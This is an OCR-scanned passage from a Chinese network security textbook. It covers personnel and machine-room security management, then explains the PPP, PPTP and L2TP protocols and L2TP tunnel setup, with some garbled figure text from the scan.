备案 。 安 全 审查 应 从 人 员 的 安全 意识 、 法 律 意识 和 安全 技能 等 几 个 方面 进行 。 主 要 包括 : 
政治 思想 方面 的 表现 ; 保密 观念 是 否 强 ,是 否 懂 保 密 规 则 ; 确认 学 历程 度 及 真实 性 ; 确定 简 
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历 的 完整 性 和 准确 性 ; 独立 的 身份 认证 ; 面试 时 回答 是 否 诚实 ; 业务 是 否 熟 练 ; 是 否 遵守 
规章 制度 ; 金钱 价值 观 ; 是 否 有 超越 权限 或 盗 取信 息 的 行为 ; 对 安全 的 认识 程度 ; 身体 状 
况 是 否 胜任 岗位 。 

(3) 安全 教育 。 

为 确保 工作 人 员 意 识 到 信息 安全 的 威胁 和 隐患 ,并 在 他 们 正常 工作 时 遵守 各 项 规章 制 
度 , 需 要 提供 必要 的 安全 教育 和 培训 。 教 育 和 培训 的 内 容 因 培训 对 象 的 不 同 而 不 同 , 主 要 包 
括 法 规 教育 、 安 全 技术 教育 和 安全 意识 教育 等 。 

(4) 安全 保密 管理 。 

进入 系统 工作 的 人 员 应 签订 保密 协议 ,并 将 此 协议 作为 规章 制度 的 一 部 分 ,承诺 对 系统 
能 够 尽 到 安全 保密 义务 ,保证 在 岗 工作 期 间 和 离 岗 后 的 一 定时 间 里 , 均 不 得 违反 保密 合同 ， 
泄漏 系统 秘密 。 

对 于 调 离 工 作 岗 位 的 人 员 , 应 立即 取消 出 入 安全 区 ,接触 保密 信息 的 授权 ,如 收回 钥匙 、 
证 章 \ 证 件 等 。 及 时 移交 工作 中 设计 的 手册 、 资 料 等 。 系 统 及 时 更 换 口 令 、 取 消 其 所 有 账号 。 
同时 向 被 调 离 的 人 员 申 明 其 保密 义务 ,否则 将 受到 行政 或 刑事 处 罚 。 

2) 系统 运行 维护 管理 制度 

包括 设备 管理 维护 制度 、 软 件 维 护 制度 、 用 户 管理 制度 、 密 钥 管 理 制 度 、 出 入 门卫 管理 值 
班 制度 .各 种 操作 规程 .各 种 行政 领导 部 门 的 定期 检查 或 监督 制度 。 

3) 计算 机 处 理 控制 管理 制度 

包括 编制 及 控制 数据 处 理 流程 .程序 软件 和 数据 的 管理 ,复制 移植 和 存储 介质 的 管理 、 
文档 日 志 的 标准 化 和 通信 和 网络 的 管理 。 

4) 文档 资料 管理 制度 

非 计算 机 的 各 种 凭证 单据、 账簿 、 报 表 和 文字 资料 ,要 妥善 保管 和 严格 控制 ; 记 账 必须 
交叉 复核 ; 各 类 人 员 所 掌握 的 资料 要 符合 自身 的 级 别 和 权限 要 求 。 

5) 计算 机 机 房 的 安全 管理 规章 制度 

建立 健全 的 机 房管 理 规章 制度 ,对 有 关 人 员 经 常 进行 安全 教育 ,定期 或 不 定期 进行 安全 
检查 ,机 房管 理 规章 制度 主要 包括 以 下 几 个 方面 。 

(1) 机 房 门 卫 管理 制度 。 

机 房 门 卫 落 实 到 人 ,根据 身份 验证 控制 人 员 的 出 入 。 对 于 限制 访问 的 地 点 可 以 采取 锁 
控制 , 锁 和 钥匙 的 分 发 和 置换 需要 进行 严格 控制 。 进 行 机 房 出 入 登记 ,无 关 人 员 未 经 许可 不 
准 进 入 机 房 。 对 带 入 带 出 的 物品 进行 检查 ,严禁 将 易 燃 、 易 爆 、 腐 蚀 性 、 强 磁性 物品 带 入 机 
房 , 严 禁 将 与 工作 无 关 的 物品 带 入 机 房 ,比如 移动 存储 介质 。 

(2) 机 房 工作 管理 制度 。 

严格 值班 制度 ,值班 人 员 要 认真 填写 值班 日 记 ; 机 房 内 使 用 过 的 废 纸 杂 物 ,应 按照 规定 
进行 坏 碎 。 机 房 内 禁止 带 和 食品、 饮料 和 香烟 等 物品 。 照 相机 或 摄影 机 、 手 持 或 电动 工具 、 
电气 设备 等 必须 经 过 主管 领导 同意 方 可 带 入 。 

(3) 机 房 操作 管理 制度 。 

机 房 要 加 双 锁 ,双人 开 、 关 机 房 ; 双人 开 、 关 计算 机 ,双人 维护 和 备份 数据 ; 为 每 台 计 算 
机 建立 档案 记录 ,将 每 天 运转 情况 进行 登记 ; 非 操作 人 员 不 准 上 级 操作 ; 计算 机 发 生 故 障 
时 ,操作 人 员 应 认真 记录 故障 现象 和 相关 信息 ,及 时 上 报 , 通 知 维护 人 员 进 行 维护 。 


(4) 机 房 卫生 管理 制度 。 

每 天 对 机 房 地 板 进行 吸 尘 打 扫 , 定 期 对 机 房 进行 除尘 ; 机 房 内 严禁 吸烟 、 吃 东西 ; 不 准 
乱 扔 废 纸 杂 物 。 

6) 详细 的 工作 手册 和 工作 记录 管理 制度 

不 论 是 机 房 门卫 人 员 ,还 是 机 房 工作 人 员 ,都 要 认真 记录 日 常 工作 的 情况 ,形成 详细 的 
工作 手册 和 工作 记录 ,以 便 之 后 可 以 对 特定 时 间 的 特定 情形 进行 详尽 掌握 。 

7) 其 他 的 重要 管理 制度 

其 他 的 重要 管理 制度 还 有 : 软件 管理 制度 .数据 管理 制度 口令 管理 制度 .病毒 的 防治 
管理 制度 .网 络 通信 安全 管理 制度 .安全 等 级 保护 管理 制度 ,对 外 交流 管理 制度 等 。 


11.4 小 结 


本 章 是 计算 机 网 络 实体 安全 方面 的 阐述 。 主 要 介绍 了 计算 机 机 房 的 安全 等 级 的 划分 、 
温度 、 湿 度 和 洁净 度 等 的 环境 要 求 ,以 及 防 电磁 干扰 、 防 静电 、 防 火 、 防 水 与 防盗 等 措施 。 对 
存储 介质 这 个 信息 的 载体 需要 采取 必要 的 保护 措施 。 最 后 强调 了 安全 管理 的 重要 性 ,为 了 
实现 安全 管理 所 要 求 的 内 容 , 需 要 健全 管理 机 构 和 规章 制度 。 

读者 要 对 网 络 实体 安全 有 总 体 了 解 ,掌握 网 络 管理 的 概念 ,对 安全 管理 的 重要 性 有 一 个 
明确 认识 。 


11.5 习 题 


1. 什么 是 网 络 实体 安全 ?网 络 实体 安全 包括 哪些 方面 ? 
2. 计算 机 网 络 机 房 的 安全 等 级 有 几 种 ? 

3. 简 述 计算 机 网 络 机 房 的 三 度 要求 。 

4. 电磁 干扰 防护 的 措施 有 哪些 ? 

5. 什么 是 安全 管理 ? 安全 管理 的 原则 是 什么 ? 
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标准 总 是 过 时 的 ,这 让 它们 成 为 了 标准 。 
一 Alan Bennett 


Internet 在 最 初 建立 时 的 指导 思想 是 资源 共享 ,因此 以 开放 性 和 可 扩展 性 为 核心 。 在 
建立 协议 模型 与 协议 实现 时 ,更 多 考虑 到 易 用 性 ,而 在 安全 性 方面 考虑 存在 严重 不 足 , 这 就 
给 攻击 者 造成 了 可 乘 之 机 。 本 章 以 TCP/IP 协议 族 结构 为 指导 , 自 底 向 上 分 层 阐述 不 同 层 
次 的 安全 协议 保障 机 制 ,主要 包括 PPP、IPSec、SSL/TLS、SET 等 。 


12.1 数据 链 路 层 安 全 通信 协议 


数据 链 路 层 对 网 络 层 显现 为 一 条 无 错 的 线路 ,主要 任务 是 加 强 最 底层 物理 层 原始 传输 
单位 比特 的 功能 ,在 两 个 相 邻 节点 间 的 线路 上 无 差错 地 传送 以 帧 为 单位 的 数据 ,还 要 解决 由 
于 链 路 上 的 通信 干扰 造成 数据 帧 的 破坏 、 丢 失 而 所 需要 的 数据 帧 的 重 发 以 及 流量 的 调节 、 出 
错 的 处 理 和 信道 的 共享 等 问题 。 

数据 链 路 层 加 密 就 是 简单 地 对 要 通过 物理 媒介 传输 的 每 一 个 字 节 进行 加 密 ; 解密 则 在 
收 到 时 处 理 。 这 可 以 保证 数据 在 链 路 上 传输 时 不 会 被 截获 。 

在 数据 链 路 层 提供 安全 机 制 的 优点 在 于 : 它 无 须 对 其 任何 上 层 内 容 进 行 改变 就 能 对 所 
有 数据 加 密 ,提供 链 路 安全 ,例如 ,加 密 的 调制 解 调 器 能 在 不 修改 通信 站 的 基础 上 提供 在 数 
据 链 路 层 加 密 ; 它 能 够 由 硬件 在 数据 传输 和 接收 时 轻易 实现 ,而 且 它 对 性 能 的 影响 将 会 很 
小 ,能 达到 的 速率 最 高 ; 它 能 够 和 数据 压缩 很 好 地 结合 起 来 ; 对 流 分 析 能 提供 最 高 的 保护 
性 ; 对 隐 通 道 能 提供 最 高 的 保护 性 ; 基于 网 络 攻击 的 途径 最 少 。 

在 数据 链 路 层 提供 安全 机 制 的 缺点 在 于 : 它 只 能 应 用 在 两 个 直 连 的 设备 上 ,而 数据 在 
网 络 上 传输 时 重要 的 是 端 到 端的 安全 ,在 单独 的 链 路 上 加 密 并 不 能 保证 整个 路 径 的 安全 性 ; 
局 域 网 并 不 能 提供 链 路 层 安全 , 即 对 内 部 攻击 人 员 无 保护 ; 最 高 的 通信 成 本 ; 新 节点 加 入 
时 要 求 电信 公司 重新 配置 网 络 。 
12.1.1 PPP 协议 

PPP(Point-to-Point Protocol) 是 “点 对 点 ”协议 , 它 提供 了 基于 广域网 的 网 络 层 数据 封 
装 和 向 上 层 提供 物理 透明 性 的 功能 。PPP 定义 一 种 如 何在 点 到 点 链 路 上 传输 多 协议 分 组 


的 封装 机 制 。PPP 协议 作为 目前 Internet 上 所 广泛 采用 的 协议 , 它 在 单机 入 网 和 路 由 器 之 
间 互 连 具 有 非常 重要 的 作用 。PPP 协议 支持 多 协议 传输 机 制 , 在 PPP 连接 上 既 可 运行 


TCP/ IP, 也 可 运行 IPX 等 其 他 多 种 通信 协议 ; PPP 的 灵活 的 配置 协商 ,使 PPP 协议 具有 广 
泛 的 适应 性 ; PPP 的 动态 地 址 协商 机 制 和 认证 机 制 ,为 客户 提供 了 大 规模 拨号 上 网 的 解决 
方案 。PPP 协议 包括 3 个 主要 部 件 : 

(1) HDLCCHigh-level Data Link Control) 部 件 , 在 串 行 连接 (Serial Link) 上 封装 数据 
报 ,PPP 使 用 HDLC 作为 “点 到 点 连接 ”上 的 基本 的 封装 策略 ,因此 它 的 数据 格式 也 符合 
HDLC 规程 的 定义 。 

(2) 可 扩展 的 LCP(Link Control Protocol) 部 件 ,用 来 监视 链 路 连接 质量 ,建立 和 配置 
数据 连接 。 

(3) NCP( 网 络 控制 协议 Network Control Protocol) 部 件 , 用 来 和 不 同 的 网 络 层 协议 建 
立 连接 和 配置 IP 选项 ,PPP 被 设计 成 可 同时 使 用 多 个 网 络 层 协议 。 

1. PPP 协议 的 基本 格式 

标准 PPP 帧 格式 如 图 12. 1 所 示 , 所 有 这 些 项 由 左 向 右 传送 。 


Flag Address | Control | Protocal |Information| FCS Flag 
0111,1110|1111,1111|0000,0011| 8/16 bits | Variable | 16/32 bits |0111,1110 


图 12.1 PPP 帧 格式 


PPP 帧 格式 除 异步 串 行 传输 中 所 用 到 的 起 / 止 位 (Start/Stop Bits) 或 者 透明 传输 中 的 
输入 字 节 之 外 ,其 他 字段 含义 如 下 : 

(1) 标志 字段 (Flag) 标 志 帧 的 开始 和 结束 ,为 一 个 字 节 , 值 为 0x7e。 

(2) 地 址 字段 (Address) 为 一 个 字 节 ,表示 链 路 上 站 的 地 址 。 

(3) 控制 字段 也 是 一 个 字 节 ,其 值 也 是 固定 值 ,为 0x03。 

(4) 协议 字段 由 两 个 字 节 组 成 ,指示 所 封装 在 信息 字段 的 数据 的 类 型 。 它 的 值 随 不 同 
的 协议 类 型 的 数据 来 决定 ,一 般 来 说 ,“cxxx” 范 围 内 的 协议 字段 的 值 代表 LCP 或 相关 协议 ; 
“8 xxx” 范 围 内 的 协议 字段 值 属于 NCP 协议 族 ;“0xxx” 范 围 内 的 协议 字段 值 代表 数据 报 的 
协议 。 

(5) 信息 字段 (Information) 是 由 0 或 多 个 字 节 组 成 ,由 协议 字段 标志 的 数据 报 构成 , 信 
息 字 段 的 结束 是 由 最 近 的 标志 字段 位 确定 的 。 在 最 近 的 FLAG 前 两 个 字 节 以 前 的 字段 是 
信息 字段 的 结束 点 。 默 认 信息 字段 的 最 大 长 度 是 1500 个 字 节 ,经 由 协商 ,可 设 定 其 他 最 大 
长 度 。 在 传输 中 ,可 以 填充 任意 长 度 的 字 节 ,使 之 达到 最 大 长 度 ,由 各 协议 自身 来 区 分 填充 
数据 和 实际 数据 。 

(6) 校 验 字段 (FCS) 通 常 为 两 个 字 节 ,为 提高 检测 能 力 , 可 经 由 协商 ,使 用 32 位 的 校 验 
字段 。FCS 计算 包括 地 址 字段 .控制 字段 .协议 字段 和 信息 字段 在 内 的 所 用 数据 (如 果 有 填 
充 数据 ,也 计算 ,因为 这 些 填充 字段 由 相应 的 协议 而 不 是 PPP 来 处 理 ) ,不 包括 其 他 的 任何 
数据 。 

2. PPP 协议 的 基本 原理 

PPP 是 一 个 有 严格 状态 变迁 的 协议 (如 图 12. 2 所 示 ) , 它 的 建 链 过 程 主要 包括 3 个 阶 
段 : 链 路 层 协商 阶段 (LCP)、 认 证 阶段 (Authenticate Protocol, AP)、 网 络 层 协商 阶段 
(NCP)。PPP 是 自 成 体系 的 一 个 协议 族 , 它 的 主 协议 是 RFC 1661, 其 中 描述 了 PPP 协议 中 
LCP 阶段 的 主要 行为 和 状态 变迁 ,AP 阶段 的 行为 由 RFC 1334 和 RFC 1994 协议 描述 , 包 
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括 口令 验证 协议 (Password Authentication Protocol, PAP) 和 挑战 握手 验证 协议 
(Challenge-Handshake Authentication Protocol,CHAP) 两 种 认证 方式 。NCP 阶段 由 一 系 
列 的 网 络 传输 控制 协议 分 别 描述 , 包括 IPCP(RFC 1332) ,IPXCP(RFC 1552) 等 。 此 外 ,还 
有 提高 传输 效率 的 一 系列 压缩 协议 (RFC 1967 等 ) ,充分 利用 多 链 路 同时 传输 数据 的 多 链 
路 协议 (Multilink PPP、RFC 1990) , 链 路 中 的 QoS(Quality of Service) 控 制 一 LQM(Link 
Quality Monitoring, RFC 1989) 等 。 


y Ba I 此 
检测 到 载波 | 到 放 两 一 此 过 开门 让 
| 
网 络 
-1 | i 
终 上 | 通信 名 采 | 打开 


12.2 PPP 协议 的 状态 图 


1) 静止 (死亡 ) 阶 段 

一 个 连接 的 开始 和 结束 都 要 经 历 这 个 阶段 。 当 一 个 外 部 事件 指示 物理 层 已 准备 好 时 ， 
PPP 进入 建立 连接 阶段 。 此 时 ,LCP 自动 机 处 于 初始 阶段 。 

2) 建立 阶段 

LCP 用 于 交换 配置 信息 包 、 建 立 连接 。 一 旦 一 个 配置 成 功 的 信息 包 发 送 且 被 接收 ,就 
完成 了 交换 ,进入 LCP 开启 状态 。 所 有 的 配置 选项 都 假定 使 用 默认 值 ,除非 在 配置 交换 过 
程 中 被 改变 。 只 有 那些 与 特定 的 网 络 层 协议 无 关 的 选项 才 会 被 LCP 配置 。 收 到 LCP 配置 
数据 包 将 使 链 路 从 网 络 层 协议 阶段 或 者 认证 阶段 返回 到 链 路 建立 阶段 。 

3) 认证 阶段 

在 某 些 连接 情况 下 ,希望 在 允许 网 络 层 协议 交换 数据 前 对 等 实行 认证 。 默 认 情 况 下 ,是 
不 要 求 认证 的 。 认 证 要 求 必 须 在 建立 连接 阶段 提出 ,然后 进入 认证 阶段 。 如 果 认 证 失败 ,将 
进入 连接 终止 阶段 。 在 此 阶段 只 对 连接 协议 .认证 协议 .连接 质量 测试 数据 包 进行 处 理 。 

4) 网 络 层 协议 阶段 

一 旦 PPP 完成 上 述 阶 段 , 便 进 入 网 络 协议 阶段 。 每 一 个 网 络 层 协议 (例如 IP、IPX、 
AppleTalk 等 ) 必 须 有 相应 的 NCP 单独 配置 ,每 个 网 络 控制 协议 都 可 以 随时 打开 或 关闭 。 
此 阶段 LCP 协议 自动 状态 机 处 于 打开 状态 ,接收 到 的 任何 不 支持 的 协议 数据 包 都 会 被 返回 
一 个 协议 拒绝 包 ,而 接收 到 的 所 有 支持 的 数据 包 都 将 被 丢弃 。 此 时 , 链 路 上 流通 的 是 NCP 
数据 包 、LCP 数据 包 以 及 网 络 协议 数据 包 。 

5) 终止 连接 阶段 

PPP 连接 可 以 随时 被 终止 。LCP 通过 交换 连接 终止 包 来 终止 连接 。 当 连接 被 终止 时 ， 
PPP 会 通知 物理 层 采取 相应 的 动作 。 只 有 当 物 理 层 断 开 , 连 接 才 会 真正 被 终止 。 在 此 阶 
段 ,接收 到 的 所 有 数据 包 都 将 被 丢弃 。 


12.1.2 PPTP 协议 


点 到 点 隧道 协议 (Point-to-Point Tunneling Protocol,RFC 2637) 是 对 PPP 的 扩展 。 由 
Microsoft 和 Ascend 开发 。PPTP 使 用 一 种 增强 的 GRE(Generic Routing Encapsulation) 
封装 机 制 使 PPP 数据 包 按 隧道 方式 穿越 IP 网 络 ,并 对 传送 的 PPP 数据 流 进行 流量 控制 和 
拥塞 控制 。PPTP 并 不 对 PPP 协议 进行 任何 修改 ,只 提供 了 一 种 传送 PPP 的 机 制 , 并 增强 
了 PPP 的 认证 .压缩 .加 密 等 功能 。 由 于 PPTP 基于 PPP 协议 ,因而 它 支持 多 种 网 络 协议 , 
可 将 IP、IPX、APPLETALK、NetBEUI 的 数据 包 封 装 于 PPP 数据 帧 中 。 

PPTP 是 一 种 用 于 让 远程 用 户 拨号 连接 到 本 地 ISP(Internet Service Provider, Internet 
服务 提供 商 ) ,通过 Internet 安全 远程 访问 公司 网 络 资源 的 网 络 技术 。PPTP 对 PPP 协议 本 
身 并 没有 做 任何 修改 ,只 是 使 用 PPP 建立 拨号 连接 然后 获取 这 些 PPP 包 并 把 它们 封装 进 
GRE 头 中 。PPTP 使 用 PPP 协议 的 PAP 或 CHAP 进行 认证 ,另外 也 支持 Microsoft 公司 
的 点 到 点 加 密 技 术 (MPPE)。PPTP 支持 的 是 一 种 客户 一 一 LAN 型 隧道 的 VPN 实现 。 

建立 PPTP 连接 ,首先 要 建立 客户 端 与 本 地 ISP 的 PPP 连接 。 一 旦 成 功 地 接 入 因 特 
网 ,下 一 步 就 是 建立 PPTP 连接 。 从 最 顶端 PPP 客户 端 PAC 和 PNS 服务 器 之 间 开 始 , 由 
已 经 安装 好 PPTP 的 PAC 建立 并 管理 PPTP 任务 。 如 果 PPP 客户 端 将 PPTP 添加 到 它 的 
协议 中 ,所 有 列 出 来 的 PPTP 通信 都 会 在 支持 PPTP 的 客户 端 上 开始 与 终止 。 由 于 所 有 的 
通信 都 将 在 IP 包 内 通过 隧道 ,因此 PAC 只 起 着 通过 PPP 连接 进 因特网 的 入 口 点 的 作用 。 
从 技术 上 讲 ,PPP 包 从 PPTP 隧道 的 一 端 传输 到 另 一 端 ,这 种 隧道 对 用 户 是 完全 透明 的 。 

PPTP 具有 两 种 不 同 的 工作 模式 : 被 动 模式 和 主动 模式 。 被 动 模式 的 PPTP 会 话 通过 
一 个 一 般 是 由 位 于 ISP 处 的 前 端 处 理 器 发 起 ,在 客户 端 不 需要 安装 任何 与 PPTP 有 关 的 软 
件 。 在 拨号 连接 到 ISP 的 过 程 中 .ISP 为 用 户 提供 所 有 的 相应 服务 和 帮助 。 被 动 方式 的 好 
处 是 降低 了 对 客户 的 要 求 ,缺点 是 限制 了 用 户 对 Internet 其 他 部 分 的 访问 。 主 动 方式 是 由 
客户 建立 一 个 与 网 络 另外 一 端 服 务 器 直接 相连 的 PPTP 隧道 。 这 种 方式 不 需要 ISP 的 参 
与 ,不 再 需要 位 于 ISP 处 的 前 端 处 理 器 ,ISP 只 提供 透明 的 传输 通道 。 这 种 方式 的 优点 是 客 
户 拥有 对 PPTP 的 绝对 控制 ,缺点 是 对 用 户 的 要 求 较 高 并 需要 在 客户 端 安装 支持 PPTP 的 
相应 软件 。 

PPTP 协议 是 一 个 为 中 小 企业 提供 的 VPN 解决 方案 ,但 PPTP 协议 在 实现 上 存在 着 重 
大 安全 隐患 。 有 研究 表明 其 安全 性 甚至 比 PPP 协议 还 要 弱 ,因此 不 适用 于 需要 一 定安 全 保 
证 的 通信 。 如 果 条 件 允许 的 话 , 应 该 采用 完全 能 够 替代 PPTP 的 第 二 层 隧 道 协 议 (L2TP)。 


12.1.3 L2TP 协议 


第 二 层 隧道 协议 (Layer 2 Tunneling Protocol,L2TP) 是 用 来 整合 多 协议 拨号 服务 至 现 
有 的 Internet 服务 提供 商 点 。IETF(Internet 工程 任务 组 ) 的 开放 标准 L2TP 协议 结合 了 
PPTP 协议 和 L2FPS 的 优点 ,特别 适合 于 组 建 远程 接 入 方式 的 VPN ,目前 已 经 成 为 事实 上 
的 工业 标准 。 在 由 L2TP 构建 的 VPN 中 ,有 两 种 类 型 的 服务 器 : 一 种 是 L2TP 访问 集中 器 
(L2TP Access Concentrator,LAC) , 它 是 附属 在 网 络 上 的 具有 PPP 端 系统 和 L2TP 协议 处 


@ 第 二 层 转发 协议 (Level 2 Forwarding Protocol,L2FP) 由 Cisco 公司 提交 给 IETF , 详 见 RFC 2341 。 
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理 能 力 的 设备 ,LAC 一 般 就 是 一 个 网 络 接 入 服务 器 ,用 于 为 用 户 提供 网 络 接 入 服务 ; 另 一 
种 是 L2TP 网 络 服务 器 (L2TP Network Server,LNS) ,是 PPP 端 系 统 上 用 于 处 理 L2TP 协 
议 服务 器 端 部 分 的 软件 。 

L2TP 将 PPP 的 这 种 模式 进行 了 扩展 。 它 允许 第 二 层 链 路 和 PPP 的 终止 端点 分 别 位 
于 由 包 交 换 网 络 所 连接 的 不 同 地 方 。 使 用 L2TP 的 时 候 , 用 户 获得 一 个 到 访问 集中 器 的 第 
二 层 连 接 , 然 后 访问 集中 器 再 将 PPP 帧 用 隧道 的 方式 转发 到 NAS(Network Access 
Server, 网 络 接 入 服务 器 )。 这 种 分 离 的 一 个 明显 的 好 处 就 是 不 必 让 第 二 层 连接 在 NAS 处 
终止 ,而 是 可 以 在 电路 汇集 处 终止 ,因而 可 以 扩展 到 帧 中 继 电 路 或 互联 网 上 。 而 在 用 户 看 
来 ,由 于 这 些 处 理 是 不 可 见 的 ,是 使 用 NAS 直接 相连 还 是 使 用 L2TP 并 没有 什么 不 同 。 
L2TP 协议 还 定义 了 一 些 隧道 的 管理 与 维护 操作 ,如 定期 发 送 Hello 报 文 以 判断 隧道 的 连 
通 性 ,利用 协议 提供 的 发 送 序 号 (Next Sent) 域 和 接收 序号 (Next Received) 域 进行 隧道 的 流 
量 控制 和 拥塞 控制 等 。 

L2TP 能 够 支持 多 种 网 络 层 协议 如 IP、IPX、Appletalk 等 ,支持 任意 的 广域网 技术 如 帧 
中 继 .ATM、X. 25、SDH/SONET 以 及 任意 的 以 太 网 技术 。L2TP 提供 了 流量 控制 的 机 制 ， 
能 够 完成 输入 、 输 出 呼叫 的 功能 ,并 且 提 供 了 一 种 加 密 措施 (如 MD5 的 加 密 算法 ), 保 证 关 
键 数据 如 用 户 名 .口令 等 的 安全 性 。L2TP 是 一 个 标准 的 协议 ,所 有 的 客户 、 服 务 提供 者 以 
及 企业 网 络 管理 者 均 能 享受 到 L2TP 提供 的 多 服务 供应 业务 的 好 处 ,可 以 利用 这 些 供应 商 
之 间 的 互 操作 性 建立 一 个 全 球 性 的 标准 的 接 人 VPN 业务 。 

1. L2TP 协议 特点 

1) 差错 控制 

在 IP 网 络 中 ,L2TP 采用 UDP 封装 传送 PPP 帧 。 由 于 UDP 不 能 提供 可 靠 的 网 络 数 
据 传 输 ,L2TP 通过 其 包头 中 的 两 个 字段 Next Received 和 Next Sent 进行 流 控制 和 差错 检 
测 。L2TP 规定 ,在 其 控制 信息 包 中 必须 包含 Next Received 和 Next Sent ,在 用 户 数据 包 中 
Next Received 和 Next Sent 是 可 选 字段 。 在 不 采用 序列 号 进行 传输 时 ,可 以 使 用 上 层 协议 
(如 TCP) ,进行 差错 控制 。 

2) 地 址 分 配 

L2TP 支持 在 NCP 协商 机 制 的 基础 上 动态 分 配 客户 地 址 。 在 一 般 的 拨号 接 人 服务 中 ， 
用 户 都 是 接受 ISP 分 配 的 动态 IP 地 址 ,由 于 企业 网 一 般 均 采用 一 些 安全 措施 来 保护 自己 的 
网 络 ,企业 员工 通过 ISP 拨号 上 网 时 就 不 能 穿 过 防火 墙 访 问 网 内 资源 。 采 用 L2TP 后 ,LNS 
可 以 位 于 企业 防火 墙 后 面 , 可 以 为 企业 网 远程 拨号 用 户 分 配 企业 网 内 部 IP 地 址 ,通过 对 
PPP 帧 进行 封装 ,用 户 数据 包 可 以 穿 过 防火 墙 到 达 企业 内 部 网 。 

3) 身份 认证 

用 户 拨 号 上 网 时 ,LAC 提示 用 户 输入 账号 之 后 ,LAC 根据 电话 号 码 或 用 户 名 确认 用 户 
为 VPN 用 户 ,根据 配置 信息 找到 相应 的 LNS, 然 后 交换 控制 信息 、 建 立 隧道 为 用 户 的 呼叫 
分 配 ID, 并 将 身份 认证 信息 传送 给 LNS, 由 LNS 完成 用 户 的 身份 认证 ,确认 是 否 接 受用 户 
的 呼叫 连接 请 求 。 在 LNS 接受 连接 请 求 后 ,LNS 还 可 以 再 次 对 用 户 身 份 进行 确认 。 

4) 安全 性 能 

在 隧道 建立 过 程 中 ,隧道 的 两 个 终 节 点 LAC 和 LNS 利用 CHAP 方式 验证 对 方 的 身 
份 ,由 于 只 是 在 隧道 的 建立 过 程 中 进行 身份 认证 ,而 在 其 后 的 数据 包 中 没有 加 密 和 认证 信 


息 , 因 此 ,黑客 可 以 很 容易 地 侦 听 并 向 LAC 和 LNS 的 隧道 中 插入 自己 伪造 的 数据 包 , 从 而 
达到 盗用 隧道 和 欺骗 用 户 的 目的 。L2TP 协议 本 身 没 有 弥补 这 一 漏洞 的 方法 ,但 是 采用 
IPSec 对 LAC 和 LNS 之 间 的 IP 包 进 行 加 密 传送 可 以 解决 这 一 问题 。 

2. L2TP 协议 格式 

L2TP 的 协议 结构 如 图 12. 3 所 示 , 可 以 看 到 L2TP 最 终 可 以 封装 成 UDP 或 者 其 他 
ATM 等 在 不 同 介质 的 网 络 上 传播 。 


PPP 帧 
L2TP 数 据 消 息 L2TP 控 制 消息 
L2TP 数 据 通道 L2TP 控 制 通道 
(不 可 车) (可 靠 ) 


包 传输 (如 UDP、FR、ATM 等 ) 


图 12.3 L2TP 的 协议 结构 


L2TP 头 部 格式 如 图 12.4 所 示 ,L2TP 分 组 的 控制 和 数据 通道 具有 相同 的 头 格式 。 在 
某 个 域 可 选 的 情况 下 ,如 果 该 域 被 标记 为 不 存在 , 则 在 消息 中 不 存在 它 的 空间 。 注 意 ， 
Length、Ns、Nr 域 在 数据 消息 中 可 选 ,而 在 控制 消息 中 就 必须 存在 。 


1|2|13|4|5|6|7|18|9|10|1|1213|14|15|16|1718|19|10|111213|14|5|1617|18|9101112 
TILIXIX|IS|IXIOIPIXIX|XIX Ver Lenth(opt) 
Tunnel ID Session ID 
Ns(opt) Nr(opt) 
Offset Size(opt) Offset Pad... (opt) 


12.4 L2TP 包头 格式 


位 为 标识 消息 类 型 。 数 据 消息 设置 为 0, 控制 消息 设置 为 1。 

。 如 果 工 位 为 1, 表 示 长 度 域 存在 。 对 于 控制 消息 ,必须 设置 为 1 。 

X 位 是 为 将 来 保留 的 扩展 位 。 所 有 的 保留 位 在 呼出 消息 中 必须 设置 为 0, 在 呼 入 消 
息 中 必须 忽略 。 

。 若 O 位 (序列 号 位 ) 为 1, 则 Ns 和 Nr 域 存在 。 对 于 控制 消息 来 说 ,该 位 必须 设置 为 1。 
。 Ver( 版 本 号 ) 可 以 设置 为 2, 标 明 当 前 的 L2TP 版 本 号 为 第 二 版 。 或 者 为 3, 标 明 当 
前 的 L2TP 版 本 号 为 第 三 版 。 

Length 域 标识 以 8 位 组 表示 的 消息 长 度 。 

Tunnel ID 指示 控制 链接 的 标识 符 。 只 有 本 地 有 效 的 标识 符 才 能 用 来 给 L2TP 
tunnels 命名 。 也 就 是 说 ,相同 的 tunnel 会 由 不 同 端 给 予 不 同 的 tunnel ID。 每 个 消 
息 中 的 tunnel ID 由 接收 者 给 出 .而 不 是 发 送 者 。tunnel 创建 期 间 , tunnel ID 用 
Assigned Tunnel ID AVPs 选择 和 交换 。 

Session ID 指示 一 个 tunnel 内 的 会 话 标识 符 。 只 有 本 地 有 效 的 标识 符 才 能 用 来 给 
L2TP session 命名 。 也 就 是 说 ,相同 的 会 话 会 由 会 话 的 不 同 端 给 出 不 同 的 Session 
ID。Session ID 的 确定 由 消息 的 接收 者 决定 ,而 不 是 发 送 方 。Session ID 用 


网 络 妆 全 座 议 


秦 于 案例 的 网 络 安全 技术 与 实践 


Assignedsession ID AVPs 选择 和 交换 。 
Ns 指示 数据 或 控制 消息 的 序列 号 ,从 0 开始 ,每 发 送 一 个 消息 其 值 加 1 。 
。 Nr 指示 下 一 个 期 望 被 收 到 的 控制 消息 的 序列 号 。Nr 的 值 设 置 成 按 顺序 最 后 收 到 
的 Ns 的 值 加 1。 但 是 在 数据 消息 中 ,Nr 被 保留 ,即使 进行 了 设置 ,也 要 忽略 。 
Offset Size 域 如 果 存 在 , 则 表明 运送 的 数据 期 望 开始 的 地 方 。 如 果 存 在 ,L2TP 头 在 
offset padding 的 最 后 一 个 8 位 组 结束 。 

3. L2TP 工作 流程 

L2TP 协议 的 操作 包括 3 个 过 程 : 隧道 建立 会话 建立 和 PPP 帧 的 封装 前 转 。 

1) 隧道 建立 

隧道 建立 就 是 L2TP 控制 连接 的 建立 ,通过 控制 连接 管理 类 消息 实现 ,如 图 12.5 所 示 。 
LAC 和 LNS 任 一 端 均 可 发 起 隧道 的 建立 , 它 包 括 两 轮 消 息 交 换 , 主要 完成 如 下 功能 : LAC 
和 LNS 相互 间 的 认证 ,采用 CHAP 认证 算法 ; LAC 和 LNS 各 自 为 隧道 分 配 隧 道 ID ,并 通 
知 对 方 ; 确定 隧道 的 承载 类 型 和 帧 封装 类 型 ; 确定 接收 窗口 尺寸 ; 隧道 终结 可 用 StopCCN 
消息 完成 。 


LNS/LAC LAC/ILNS 
SCCRQ 
上 SCCRP 图 | 


SCCCN 
- ZLB 


图 12.5 隧道 建立 过 程 


2) 会 话 建 立 

